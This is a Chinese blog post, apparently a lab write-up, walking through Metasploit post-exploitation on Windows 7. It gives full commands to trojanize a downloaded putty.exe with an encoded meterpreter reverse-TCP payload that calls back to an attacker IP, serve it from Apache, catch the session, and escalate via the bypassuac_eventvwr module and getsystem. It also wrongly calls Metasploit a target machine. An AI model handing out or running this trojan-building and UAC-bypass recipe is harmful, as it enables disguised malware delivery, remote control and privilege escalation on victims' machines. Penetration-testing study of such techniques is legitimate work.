MSF渗透测试之msfvenom提权

MSF渗透测试之msfvenom

MSF后渗透之msfvenom生成payload提权

前言

MSF后渗透之msfvenom生成payload提权
1.MSF的使用

一、MSF的使用?

MSF是一个渗透测试的靶机,集成了多个漏洞库和多个payload,用于渗透测试提权专用的提权工具。

二、提权第一步

1.打开kali,进入msfvenom,生成payload

代码如下(示例):
1.首先先打开kali的服务器, service apache2 start,让外界可以访问到kali。
2.生成payload。
(1)先在kali下载好后门工具。执行命令。
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
(2)利用msfvenom生成payload。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.222.131 lport=5445 -x putty.exe -e x86/shikata_ga_nai -f exe -o /var/www/html/hello.exe
在这里插入图片描述
(3)打开msf,使用攻击模块。
use exploit/multi/handler
(4)设置payload。
set payload windows/meterpreter/reverse_tcp
(5)打开options进行查看。
在这里入图片描述
设置好目标主机ip地址和端口
set lhost 192.168.222.131
set lport 5445
(6)run后,成功进入meterpreter后渗透阶段
在这里插入图片描述
(7)进行进一步的提权发现得不到系统的信息。只能继续下一步攻击,获得更高的权限。首先先回到session,执行background。
回到回话后,使用模块,设置session参数为1。
使用新模块提权
(8)run后得到系统信息,因为是在本机,直接就可以看到主机的事件查看表。
提权成功图
(9)在win7中,后渗透的取得系统权限的命令和模块执行background回到会话中
在这里插入图片描述
使用提权模块
use exploit/windows/local/bypassuac_eventvwr
查看options,设置session为
set session 1
在这里插入图片描述
执行run后,输入getsystem即可提升到系统权限了
实验成功

总结

本次实验是对MSF后渗透模块的一次渗透,利用msfvenom工具进行提权,集合了各个模块的使用,加深对MSF的进一步了解。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值